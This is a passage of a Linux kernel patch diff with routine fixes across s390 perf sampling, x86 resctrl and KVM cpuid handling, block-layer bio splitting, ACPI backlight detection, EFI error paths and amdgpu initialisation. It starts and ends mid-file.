+-	*trailer = SDB_TE_ALERT_REQ_MASK;
++	te = (struct hws_trailer_entry *)trailer_entry_ptr(sdb);
++	te->header.a = 1;
+ 
+ 	/* Link SDB into the sample-data-block-table */
+ 	*sdbt = sdb;
+@@ -1206,7 +1207,7 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+ 					    "%s: Found unknown"
+ 					    " sampling data entry: te->f %i"
+ 					    " basic.def %#4x (%p)\n", __func__,
+-					    te->f, sample->def, sample);
++					    te->header.f, sample->def, sample);
+ 			/* Sample slot is not yet written or other record.
+ 			 *
+ 			 * This condition can occur if the buffer was reused
+@@ -1217,7 +1218,7 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+ 			 * that are not full.  Stop processing if the first
+ 			 * invalid format was detected.
+ 			 */
+-			if (!te->f)
++			if (!te->header.f)
+ 				break;
+ 		}
+ 
+@@ -1227,6 +1228,16 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+ 	}
+ }
+ 
++static inline __uint128_t __cdsg(__uint128_t *ptr, __uint128_t old, __uint128_t new)
++{
++	asm volatile(
++		"	cdsg	%[old],%[new],%[ptr]\n"
++		: [old] "+d" (old), [ptr] "+QS" (*ptr)
++		: [new] "d" (new)
++		: "memory", "cc");
++	return old;
++}
++
+ /* hw_perf_event_update() - Process sampling buffer
+  * @event:	The perf event
+  * @flush_all:	Flag to also flush partially filled sample-data-blocks
+@@ -1243,10 +1254,11 @@ static void hw_collect_samples(struct perf_event *event, unsigned long *sdbt,
+  */
+ static void hw_perf_event_update(struct perf_event *event, int flush_all)
+ {
++	unsigned long long event_overflow, sampl_overflow, num_sdb;
++	union hws_trailer_header old, prev, new;
+ 	struct hw_perf_event *hwc = &event->hw;
+ 	struct hws_trailer_entry *te;
+ 	unsigned long *sdbt;
+-	unsigned long long event_overflow, sampl_overflow, num_sdb, te_flags;
+ 	int done;
+ 
+ 	/*
+@@ -1266,25 +1278,25 @@ static void hw_perf_event_update(struct perf_event *event, int flush_all)
+ 		te = (struct hws_trailer_entry *) trailer_entry_ptr(*sdbt);
+ 
+ 		/* Leave loop if no more work to do (block full indicator) */
+-		if (!te->f) {
++		if (!te->header.f) {
+ 			done = 1;
+ 			if (!flush_all)
+ 				break;
+ 		}
+ 
+ 		/* Check the sample overflow count */
+-		if (te->overflow)
++		if (te->header.overflow)
+ 			/* Account sample overflows and, if a particular limit
+ 			 * is reached, extend the sampling buffer.
+ 			 * For details, see sfb_account_overflows().
+ 			 */
+-			sampl_overflow += te->overflow;
++			sampl_overflow += te->header.overflow;
+ 
+ 		/* Timestamps are valid for full sample-data-blocks only */
+ 		debug_sprintf_event(sfdbg, 6, "%s: sdbt %#lx "
+ 				    "overflow %llu timestamp %#llx\n",
+-				    __func__, (unsigned long)sdbt, te->overflow,
+-				    (te->f) ? trailer_timestamp(te) : 0ULL);
++				    __func__, (unsigned long)sdbt, te->header.overflow,
++				    (te->header.f) ? trailer_timestamp(te) : 0ULL);
+ 
+ 		/* Collect all samples from a single sample-data-block and
+ 		 * flag if an (perf) event overflow happened.  If so, the PMU
+@@ -1294,12 +1306,16 @@ static void hw_perf_event_update(struct perf_event *event, int flush_all)
+ 		num_sdb++;
+ 
+ 		/* Reset trailer (using compare-double-and-swap) */
++		/* READ_ONCE() 16 byte header */
++		prev.val = __cdsg(&te->header.val, 0, 0);
+ 		do {
+-			te_flags = te->flags & ~SDB_TE_BUFFER_FULL_MASK;
+-			te_flags |= SDB_TE_ALERT_REQ_MASK;
+-		} while (!cmpxchg_double(&te->flags, &te->overflow,
+-					 te->flags, te->overflow,
+-					 te_flags, 0ULL));
++			old.val = prev.val;
++			new.val = prev.val;
++			new.f = 0;
++			new.a = 1;
++			new.overflow = 0;
++			prev.val = __cdsg(&te->header.val, old.val, new.val);
++		} while (prev.val != old.val);
+ 
+ 		/* Advance to next sample-data-block */
+ 		sdbt++;
+@@ -1384,7 +1400,7 @@ static void aux_output_end(struct perf_output_handle *handle)
+ 	range_scan = AUX_SDB_NUM_ALERT(aux);
+ 	for (i = 0, idx = aux->head; i < range_scan; i++, idx++) {
+ 		te = aux_sdb_trailer(aux, idx);
+-		if (!(te->flags & SDB_TE_BUFFER_FULL_MASK))
++		if (!te->header.f)
+ 			break;
+ 	}
+ 	/* i is num of SDBs which are full */
+@@ -1392,7 +1408,7 @@ static void aux_output_end(struct perf_output_handle *handle)
+ 
+ 	/* Remove alert indicators in the buffer */
+ 	te = aux_sdb_trailer(aux, aux->alert_mark);
+-	te->flags &= ~SDB_TE_ALERT_REQ_MASK;
++	te->header.a = 0;
+ 
+ 	debug_sprintf_event(sfdbg, 6, "%s: SDBs %ld range %ld head %ld\n",
+ 			    __func__, i, range_scan, aux->head);
+@@ -1437,9 +1453,9 @@ static int aux_output_begin(struct perf_output_handle *handle,
+ 		idx = aux->empty_mark + 1;
+ 		for (i = 0; i < range_scan; i++, idx++) {
+ 			te = aux_sdb_trailer(aux, idx);
+-			te->flags &= ~(SDB_TE_BUFFER_FULL_MASK |
+-				       SDB_TE_ALERT_REQ_MASK);
+-			te->overflow = 0;
++			te->header.f = 0;
++			te->header.a = 0;
++			te->header.overflow = 0;
+ 		}
+ 		/* Save the position of empty SDBs */
+ 		aux->empty_mark = aux->head + range - 1;
+@@ -1448,7 +1464,7 @@ static int aux_output_begin(struct perf_output_handle *handle,
+ 	/* Set alert indicator */
+ 	aux->alert_mark = aux->head + range/2 - 1;
+ 	te = aux_sdb_trailer(aux, aux->alert_mark);
+-	te->flags = te->flags | SDB_TE_ALERT_REQ_MASK;
++	te->header.a = 1;
+ 
+ 	/* Reset hardware buffer head */
+ 	head = AUX_SDB_INDEX(aux, aux->head);
+@@ -1475,14 +1491,17 @@ static int aux_output_begin(struct perf_output_handle *handle,
+ static bool aux_set_alert(struct aux_buffer *aux, unsigned long alert_index,
+ 			  unsigned long long *overflow)
+ {
+-	unsigned long long orig_overflow, orig_flags, new_flags;
++	union hws_trailer_header old, prev, new;
+ 	struct hws_trailer_entry *te;
+ 
+ 	te = aux_sdb_trailer(aux, alert_index);
++	/* READ_ONCE() 16 byte header */
++	prev.val = __cdsg(&te->header.val, 0, 0);
+ 	do {
+-		orig_flags = te->flags;
+-		*overflow = orig_overflow = te->overflow;
+-		if (orig_flags & SDB_TE_BUFFER_FULL_MASK) {
++		old.val = prev.val;
++		new.val = prev.val;
++		*overflow = old.overflow;
++		if (old.f) {
+ 			/*
+ 			 * SDB is already set by hardware.
+ 			 * Abort and try to set somewhere
+@@ -1490,10 +1509,10 @@ static bool aux_set_alert(struct aux_buffer *aux, unsigned long alert_index,
+ 			 */
+ 			return false;
+ 		}
+-		new_flags = orig_flags | SDB_TE_ALERT_REQ_MASK;
+-	} while (!cmpxchg_double(&te->flags, &te->overflow,
+-				 orig_flags, orig_overflow,
+-				 new_flags, 0ULL));
++		new.a = 1;
++		new.overflow = 0;
++		prev.val = __cdsg(&te->header.val, old.val, new.val);
++	} while (prev.val != old.val);
+ 	return true;
+ }
+ 
+@@ -1522,8 +1541,9 @@ static bool aux_set_alert(struct aux_buffer *aux, unsigned long alert_index,
+ static bool aux_reset_buffer(struct aux_buffer *aux, unsigned long range,
+ 			     unsigned long long *overflow)
+ {
+-	unsigned long long orig_overflow, orig_flags, new_flags;
+ 	unsigned long i, range_scan, idx, idx_old;
++	union hws_trailer_header old, prev, new;
++	unsigned long long orig_overflow;
+ 	struct hws_trailer_entry *te;
+ 
+ 	debug_sprintf_event(sfdbg, 6, "%s: range %ld head %ld alert %ld "
+@@ -1554,17 +1574,20 @@ static bool aux_reset_buffer(struct aux_buffer *aux, unsigned long range,
+ 	idx_old = idx = aux->empty_mark + 1;
+ 	for (i = 0; i < range_scan; i++, idx++) {
+ 		te = aux_sdb_trailer(aux, idx);
++		/* READ_ONCE() 16 byte header */
++		prev.val = __cdsg(&te->header.val, 0, 0);
+ 		do {
+-			orig_flags = te->flags;
+-			orig_overflow = te->overflow;
+-			new_flags = orig_flags & ~SDB_TE_BUFFER_FULL_MASK;
++			old.val = prev.val;
++			new.val = prev.val;
++			orig_overflow = old.overflow;
++			new.f = 0;
++			new.overflow = 0;
+ 			if (idx == aux->alert_mark)
+-				new_flags |= SDB_TE_ALERT_REQ_MASK;
++				new.a = 1;
+ 			else
+-				new_flags &= ~SDB_TE_ALERT_REQ_MASK;
+-		} while (!cmpxchg_double(&te->flags, &te->overflow,
+-					 orig_flags, orig_overflow,
+-					 new_flags, 0ULL));
++				new.a = 0;
++			prev.val = __cdsg(&te->header.val, old.val, new.val);
++		} while (prev.val != old.val);
+ 		*overflow += orig_overflow;
+ 	}
+ 
+diff --git a/arch/x86/boot/bioscall.S b/arch/x86/boot/bioscall.S
+index 5521ea12f44e0..aa9b964575843 100644
+--- a/arch/x86/boot/bioscall.S
++++ b/arch/x86/boot/bioscall.S
+@@ -32,7 +32,7 @@ intcall:
+ 	movw	%dx, %si
+ 	movw	%sp, %di
+ 	movw	$11, %cx
+-	rep; movsd
++	rep; movsl
+ 
+ 	/* Pop full state from the stack */
+ 	popal
+@@ -67,7 +67,7 @@ intcall:
+ 	jz	4f
+ 	movw	%sp, %si
+ 	movw	$11, %cx
+-	rep; movsd
++	rep; movsl
+ 4:	addw	$44, %sp
+ 
+ 	/* Restore state and return */
+diff --git a/arch/x86/kernel/cpu/resctrl/monitor.c b/arch/x86/kernel/cpu/resctrl/monitor.c
+index efe0c30d3a12d..77538abeb72af 100644
+--- a/arch/x86/kernel/cpu/resctrl/monitor.c
++++ b/arch/x86/kernel/cpu/resctrl/monitor.c
+@@ -146,6 +146,30 @@ static inline struct rmid_entry *__rmid_entry(u32 rmid)
+ 	return entry;
+ }
+ 
++static int __rmid_read(u32 rmid, enum resctrl_event_id eventid, u64 *val)
++{
++	u64 msr_val;
++
++	/*
++	 * As per the SDM, when IA32_QM_EVTSEL.EvtID (bits 7:0) is configured
++	 * with a valid event code for supported resource type and the bits
++	 * IA32_QM_EVTSEL.RMID (bits 41:32) are configured with valid RMID,
++	 * IA32_QM_CTR.data (bits 61:0) reports the monitored data.
++	 * IA32_QM_CTR.Error (bit 63) and IA32_QM_CTR.Unavailable (bit 62)
++	 * are error bits.
++	 */
++	wrmsr(MSR_IA32_QM_EVTSEL, eventid, rmid);
++	rdmsrl(MSR_IA32_QM_CTR, msr_val);
++
++	if (msr_val & RMID_VAL_ERROR)
++		return -EIO;
++	if (msr_val & RMID_VAL_UNAVAIL)
++		return -EINVAL;
++
++	*val = msr_val;
++	return 0;
++}
++
+ static struct arch_mbm_state *get_arch_mbm_state(struct rdt_hw_domain *hw_dom,
+ 						 u32 rmid,
+ 						 enum resctrl_event_id eventid)
+@@ -172,8 +196,12 @@ void resctrl_arch_reset_rmid(struct rdt_resource *r, struct rdt_domain *d,
+ 	struct arch_mbm_state *am;
+ 
+ 	am = get_arch_mbm_state(hw_dom, rmid, eventid);
+-	if (am)
++	if (am) {
+ 		memset(am, 0, sizeof(*am));
++
++		/* Record any initial, non-zero count value. */
++		__rmid_read(rmid, eventid, &am->prev_msr);
++	}
+ }
+ 
+ static u64 mbm_overflow_count(u64 prev_msr, u64 cur_msr, unsigned int width)
+@@ -191,25 +219,14 @@ int resctrl_arch_rmid_read(struct rdt_resource *r, struct rdt_domain *d,
+ 	struct rdt_hw_domain *hw_dom = resctrl_to_arch_dom(d);
+ 	struct arch_mbm_state *am;
+ 	u64 msr_val, chunks;
++	int ret;
+ 
+ 	if (!cpumask_test_cpu(smp_processor_id(), &d->cpu_mask))
+ 		return -EINVAL;
+ 
+-	/*
+-	 * As per the SDM, when IA32_QM_EVTSEL.EvtID (bits 7:0) is configured
+-	 * with a valid event code for supported resource type and the bits
+-	 * IA32_QM_EVTSEL.RMID (bits 41:32) are configured with valid RMID,
+-	 * IA32_QM_CTR.data (bits 61:0) reports the monitored data.
+-	 * IA32_QM_CTR.Error (bit 63) and IA32_QM_CTR.Unavailable (bit 62)
+-	 * are error bits.
+-	 */
+-	wrmsr(MSR_IA32_QM_EVTSEL, eventid, rmid);
+-	rdmsrl(MSR_IA32_QM_CTR, msr_val);
+-
+-	if (msr_val & RMID_VAL_ERROR)
+-		return -EIO;
+-	if (msr_val & RMID_VAL_UNAVAIL)
+-		return -EINVAL;
++	ret = __rmid_read(rmid, eventid, &msr_val);
++	if (ret)
++		return ret;
+ 
+ 	am = get_arch_mbm_state(hw_dom, rmid, eventid);
+ 	if (am) {
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index e5a48f05e7876..5993da21d8225 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -580,8 +580,10 @@ static int __rdtgroup_move_task(struct task_struct *tsk,
+ 	/*
+ 	 * Ensure the task's closid and rmid are written before determining if
+ 	 * the task is current that will decide if it will be interrupted.
++	 * This pairs with the full barrier between the rq->curr update and
++	 * resctrl_sched_in() during context switch.
+ 	 */
+-	barrier();
++	smp_mb();
+ 
+ 	/*
+ 	 * By now, the task's closid and rmid are set. If the task is current
+@@ -2401,6 +2403,14 @@ static void rdt_move_group_tasks(struct rdtgroup *from, struct rdtgroup *to,
+ 			WRITE_ONCE(t->closid, to->closid);
+ 			WRITE_ONCE(t->rmid, to->mon.rmid);
+ 
++			/*
++			 * Order the closid/rmid stores above before the loads
++			 * in task_curr(). This pairs with the full barrier
++			 * between the rq->curr update and resctrl_sched_in()
++			 * during context switch.
++			 */
++			smp_mb();
++
+ 			/*
+ 			 * If the task is on a CPU, set the CPU in the mask.
+ 			 * The detection is inaccurate as tasks might move or
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 62bc7a01cecca..6047dbe048803 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -759,16 +759,22 @@ struct kvm_cpuid_array {
+ 	int nent;
+ };
+ 
++static struct kvm_cpuid_entry2 *get_next_cpuid(struct kvm_cpuid_array *array)
++{
++	if (array->nent >= array->maxnent)
++		return NULL;
++
++	return &array->entries[array->nent++];
++}
++
+ static struct kvm_cpuid_entry2 *do_host_cpuid(struct kvm_cpuid_array *array,
+ 					      u32 function, u32 index)
+ {
+-	struct kvm_cpuid_entry2 *entry;
++	struct kvm_cpuid_entry2 *entry = get_next_cpuid(array);
+ 
+-	if (array->nent >= array->maxnent)
++	if (!entry)
+ 		return NULL;
+ 
+-	entry = &array->entries[array->nent++];
+-
+ 	memset(entry, 0, sizeof(*entry));
+ 	entry->function = function;
+ 	entry->index = index;
+@@ -945,22 +951,13 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		entry->edx = edx.full;
+ 		break;
+ 	}
+-	/*
+-	 * Per Intel's SDM, the 0x1f is a superset of 0xb,
+-	 * thus they can be handled by common code.
+-	 */
+ 	case 0x1f:
+ 	case 0xb:
+ 		/*
+-		 * Populate entries until the level type (ECX[15:8]) of the
+-		 * previous entry is zero.  Note, CPUID EAX.{0x1f,0xb}.0 is
+-		 * the starting entry, filled by the primary do_host_cpuid().
++		 * No topology; a valid topology is indicated by the presence
++		 * of subleaf 1.
+ 		 */
+-		for (i = 1; entry->ecx & 0xff00; ++i) {
+-			entry = do_host_cpuid(array, function, i);
+-			if (!entry)
+-				goto out;
+-		}
++		entry->eax = entry->ebx = entry->ecx = 0;
+ 		break;
+ 	case 0xd: {
+ 		u64 permitted_xcr0 = kvm_caps.supported_xcr0 & xstate_get_guest_group_perm();
+@@ -1193,6 +1190,9 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		entry->ebx = entry->ecx = entry->edx = 0;
+ 		break;
+ 	case 0x8000001e:
++		/* Do not return host topology information.  */
++		entry->eax = entry->ebx = entry->ecx = 0;
++		entry->edx = 0; /* reserved */
+ 		break;
+ 	case 0x8000001F:
+ 		if (!kvm_cpu_cap_has(X86_FEATURE_SEV)) {
+diff --git a/arch/x86/mm/pat/memtype.c b/arch/x86/mm/pat/memtype.c
+index 66a209f7eb86d..2642bc4c8ec07 100644
+--- a/arch/x86/mm/pat/memtype.c
++++ b/arch/x86/mm/pat/memtype.c
+@@ -434,7 +434,8 @@ static unsigned long pat_x_mtrr_type(u64 start, u64 end,
+ 		u8 mtrr_type, uniform;
+ 
+ 		mtrr_type = mtrr_type_lookup(start, end, &uniform);
+-		if (mtrr_type != MTRR_TYPE_WRBACK)
++		if (mtrr_type != MTRR_TYPE_WRBACK &&
++		    mtrr_type != MTRR_TYPE_INVALID)
+ 			return _PAGE_CACHE_MODE_UC_MINUS;
+ 
+ 		return _PAGE_CACHE_MODE_WB;
+diff --git a/arch/x86/um/elfcore.c b/arch/x86/um/elfcore.c
+index 48a3eb09d9516..650cdbbdaf45e 100644
+--- a/arch/x86/um/elfcore.c
++++ b/arch/x86/um/elfcore.c
+@@ -7,7 +7,7 @@
+ #include <asm/elf.h>
+ 
+ 
+-Elf32_Half elf_core_extra_phdrs(void)
++Elf32_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+ 	return vsyscall_ehdr ? (((struct elfhdr *)vsyscall_ehdr)->e_phnum) : 0;
+ }
+@@ -60,7 +60,7 @@ int elf_core_write_extra_data(struct coredump_params *cprm)
+ 	return 1;
+ }
+ 
+-size_t elf_core_extra_data_size(void)
++size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+ 	if ( vsyscall_ehdr ) {
+ 		const struct elfhdr *const ehdrp =
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index f46c87ef951df..84f03d066cb31 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -358,11 +358,13 @@ struct bio *__bio_split_to_limits(struct bio *bio, struct queue_limits *lim,
+ 	default:
+ 		split = bio_split_rw(bio, lim, nr_segs, bs,
+ 				get_max_io_size(bio, lim) << SECTOR_SHIFT);
++		if (IS_ERR(split))
++			return NULL;
+ 		break;
+ 	}
+ 
+ 	if (split) {
+-		/* there isn't chance to merge the splitted bio */
++		/* there isn't chance to merge the split bio */
+ 		split->bi_opf |= REQ_NOMERGE;
+ 
+ 		blkcg_bio_issue_init(split);
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 0b855e033a834..63abbe342b28c 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2919,8 +2919,11 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	blk_status_t ret;
+ 
+ 	bio = blk_queue_bounce(bio, q);
+-	if (bio_may_exceed_limits(bio, &q->limits))
++	if (bio_may_exceed_limits(bio, &q->limits)) {
+ 		bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
++		if (!bio)
++			return;
++	}
+ 
+ 	if (!bio_integrity_prep(bio))
+ 		return;
+diff --git a/drivers/acpi/glue.c b/drivers/acpi/glue.c
+index 204fe94c7e458..a194f30876c59 100644
+--- a/drivers/acpi/glue.c
++++ b/drivers/acpi/glue.c
+@@ -75,7 +75,8 @@ static struct acpi_bus_type *acpi_get_bus_type(struct device *dev)
+ }
+ 
+ #define FIND_CHILD_MIN_SCORE	1
+-#define FIND_CHILD_MAX_SCORE	2
++#define FIND_CHILD_MID_SCORE	2
++#define FIND_CHILD_MAX_SCORE	3
+ 
+ static int match_any(struct acpi_device *adev, void *not_used)
+ {
+@@ -96,8 +97,17 @@ static int find_child_checks(struct acpi_device *adev, bool check_children)
+ 		return -ENODEV;
+ 
+ 	status = acpi_evaluate_integer(adev->handle, "_STA", NULL, &sta);
+-	if (status == AE_NOT_FOUND)
++	if (status == AE_NOT_FOUND) {
++		/*
++		 * Special case: backlight device objects without _STA are
++		 * preferred to other objects with the same _ADR value, because
++		 * it is more likely that they are actually useful.
++		 */
++		if (adev->pnp.type.backlight)
++			return FIND_CHILD_MID_SCORE;
++
+ 		return FIND_CHILD_MIN_SCORE;
++	}
+ 
+ 	if (ACPI_FAILURE(status) || !(sta & ACPI_STA_DEVICE_ENABLED))
+ 		return -ENODEV;
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index b47e93a24a9a4..dbfa58e799e28 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -1370,9 +1370,12 @@ static void acpi_set_pnp_ids(acpi_handle handle, struct acpi_device_pnp *pnp,
+ 		 * Some devices don't reliably have _HIDs & _CIDs, so add
+ 		 * synthetic HIDs to make sure drivers can find them.
+ 		 */
+-		if (acpi_is_video_device(handle))
++		if (acpi_is_video_device(handle)) {
+ 			acpi_add_id(pnp, ACPI_VIDEO_HID);
+-		else if (acpi_bay_match(handle))
++			pnp->type.backlight = 1;
++			break;
++		}
++		if (acpi_bay_match(handle))
+ 			acpi_add_id(pnp, ACPI_BAY_HID);
+ 		else if (acpi_dock_match(handle))
+ 			acpi_add_id(pnp, ACPI_DOCK_HID);
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 76b7e7f8894e7..1db8e68cd8bce 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -50,6 +50,10 @@ static void acpi_video_parse_cmdline(void)
+ 		acpi_backlight_cmdline = acpi_backlight_video;
+ 	if (!strcmp("native", acpi_video_backlight_string))
+ 		acpi_backlight_cmdline = acpi_backlight_native;
++	if (!strcmp("nvidia_wmi_ec", acpi_video_backlight_string))
++		acpi_backlight_cmdline = acpi_backlight_nvidia_wmi_ec;
++	if (!strcmp("apple_gmux", acpi_video_backlight_string))
++		acpi_backlight_cmdline = acpi_backlight_apple_gmux;
+ 	if (!strcmp("none", acpi_video_backlight_string))
+ 		acpi_backlight_cmdline = acpi_backlight_none;
+ }
+diff --git a/drivers/block/drbd/drbd_req.c b/drivers/block/drbd/drbd_req.c
+index 7f9bcc82fc9c4..d700bf06b534f 100644
+--- a/drivers/block/drbd/drbd_req.c
++++ b/drivers/block/drbd/drbd_req.c
+@@ -1607,6 +1607,8 @@ void drbd_submit_bio(struct bio *bio)
+ 	struct drbd_device *device = bio->bi_bdev->bd_disk->private_data;
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	/*
+ 	 * what we "blindly" assume:
+diff --git a/drivers/block/ps3vram.c b/drivers/block/ps3vram.c
+index c76e0148eada3..574e470b220b0 100644
+--- a/drivers/block/ps3vram.c
++++ b/drivers/block/ps3vram.c
+@@ -587,6 +587,8 @@ static void ps3vram_submit_bio(struct bio *bio)
+ 	dev_dbg(&dev->core, "%s\n", __func__);
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	spin_lock_irq(&priv->lock);
+ 	busy = !bio_list_empty(&priv->list);
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index 204e39006dda8..c17bd845f5fcb 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -307,6 +307,7 @@ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 		max_perf = min_perf;
+ 
+ 	amd_pstate_update(cpudata, min_perf, des_perf, max_perf, true);
++	cpufreq_cpu_put(policy);
+ }
+ 
+ static int amd_get_min_freq(struct amd_cpudata *cpudata)
+diff --git a/drivers/edac/edac_device.c b/drivers/edac/edac_device.c
+index 19522c568aa5d..878deb4880cdb 100644
+--- a/drivers/edac/edac_device.c
++++ b/drivers/edac/edac_device.c
+@@ -394,17 +394,16 @@ static void edac_device_workq_teardown(struct edac_device_ctl_info *edac_dev)
+  *	Then restart the workq on the new delay
+  */
+ void edac_device_reset_delay_period(struct edac_device_ctl_info *edac_dev,
+-					unsigned long value)
++				    unsigned long msec)
+ {
+-	unsigned long jiffs = msecs_to_jiffies(value);
+-
+-	if (value == 1000)
+-		jiffs = round_jiffies_relative(value);
+-
+-	edac_dev->poll_msec = value;
+-	edac_dev->delay	    = jiffs;
++	edac_dev->poll_msec = msec;
++	edac_dev->delay	    = msecs_to_jiffies(msec);
+ 
+-	edac_mod_work(&edac_dev->work, jiffs);
++	/* See comment in edac_device_workq_setup() above */
++	if (edac_dev->poll_msec == 1000)
++		edac_mod_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
++	else
++		edac_mod_work(&edac_dev->work, edac_dev->delay);
+ }
+ 
+ int edac_device_alloc_index(void)
+diff --git a/drivers/edac/edac_module.h b/drivers/edac/edac_module.h
+index 50ed9f2425bb5..4ed24d664d83b 100644
+--- a/drivers/edac/edac_module.h
++++ b/drivers/edac/edac_module.h
+@@ -52,7 +52,7 @@ bool edac_stop_work(struct delayed_work *work);
+ bool edac_mod_work(struct delayed_work *work, unsigned long delay);
+ 
+ extern void edac_device_reset_delay_period(struct edac_device_ctl_info
+-					   *edac_dev, unsigned long value);
++					   *edac_dev, unsigned long msec);
+ extern void edac_mc_reset_delay_period(unsigned long value);
+ 
+ /*
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index f12cc29bd4b84..033aac6be7daa 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -374,8 +374,8 @@ static int __init efisubsys_init(void)
+ 	efi_kobj = kobject_create_and_add("efi", firmware_kobj);
+ 	if (!efi_kobj) {
+ 		pr_err("efi: Firmware registration failed.\n");
+-		destroy_workqueue(efi_rts_wq);
+-		return -ENOMEM;
++		error = -ENOMEM;
++		goto err_destroy_wq;
+ 	}
+ 
+ 	if (efi_rt_services_supported(EFI_RT_SUPPORTED_GET_VARIABLE |
+@@ -423,7 +423,10 @@ err_unregister:
+ 		generic_ops_unregister();
+ err_put:
+ 	kobject_put(efi_kobj);
+-	destroy_workqueue(efi_rts_wq);
++err_destroy_wq:
++	if (efi_rts_wq)
++		destroy_workqueue(efi_rts_wq);
++
+ 	return error;
+ }
+ 
+diff --git a/drivers/firmware/efi/runtime-wrappers.c b/drivers/firmware/efi/runtime-wrappers.c
+index f3e54f6616f02..60075e0e4943a 100644
+--- a/drivers/firmware/efi/runtime-wrappers.c
++++ b/drivers/firmware/efi/runtime-wrappers.c
+@@ -62,6 +62,7 @@ struct efi_runtime_work efi_rts_work;
+ 									\
+ 	if (!efi_enabled(EFI_RUNTIME_SERVICES)) {			\
+ 		pr_warn_once("EFI Runtime Services are disabled!\n");	\
++		efi_rts_work.status = EFI_DEVICE_ERROR;			\
+ 		goto exit;						\
+ 	}								\
+ 									\
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index e7bcfca4159f6..447ee4ea5c903 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -440,6 +440,9 @@ static const struct file_operations psci_debugfs_ops = {
+ 
+ static int __init psci_debugfs_init(void)
+ {
++	if (!invoke_psci_fn || !psci_ops.get_version)
++		return 0;
++
+ 	return PTR_ERR_OR_ZERO(debugfs_create_file("psci", 0444, NULL, NULL,
+ 						   &psci_debugfs_ops));
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 0be85d19a6f3e..8f83d5b6ceaad 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -36,6 +36,7 @@
+ #include <generated/utsrelease.h>
+ #include <linux/pci-p2pdma.h>
+ 
++#include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_probe_helper.h>
+ #include <drm/amdgpu_drm.h>
+@@ -89,6 +90,8 @@ MODULE_FIRMWARE("amdgpu/navi12_gpu_info.bin");
+ #define AMDGPU_MAX_RETRY_LIMIT		2
+ #define AMDGPU_RETRY_SRIOV_RESET(r) ((r) == -EBUSY || (r) == -ETIMEDOUT || (r) == -EINVAL)
+ 
++static const struct drm_driver amdgpu_kms_driver;
++
+ const char *amdgpu_asic_name[] = {
+ 	"TAHITI",
+ 	"PITCAIRN",
+@@ -3677,6 +3680,11 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 	if (r)
+ 		return r;
+ 
++	/* Get rid of things like offb */
++	r = drm_aperture_remove_conflicting_pci_framebuffers(adev->pdev, &amdgpu_kms_driver);
++	if (r)
++		return r;
++
+ 	/* Enable TMZ based on IP_VERSION */
+ 	amdgpu_gmc_tmz_set(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index b59466972ed7a..2e5d78b6635c4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -23,7 +23,6 @@
+  */
+ 
+ #include <drm/amdgpu_drm.h>
+-#include <drm/drm_aperture.h>
+ #include <drm/drm_drv.h>
+ #include <drm/drm_gem.h>
+ #include <drm/drm_vblank.h>
+@@ -2123,11 +2122,6 @@ static int amdgpu_pci_probe(struct pci_dev *pdev,
+ 	}
+ #endif
+ 
+-	/* Get rid of things like offb */
+-	ret = drm_aperture_remove_conflicting_pci_framebuffers(pdev, &amdgpu_kms_driver);
+-	if (ret)
+-		return ret;
+-
+ 	adev = devm_drm_dev_alloc(&pdev->dev, &amdgpu_kms_driver, typeof(*adev), ddev);
+ 	if (IS_ERR(adev))
+ 		return PTR_ERR(adev);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 3be3cba3a16db..cfd78c4a45baa 100644
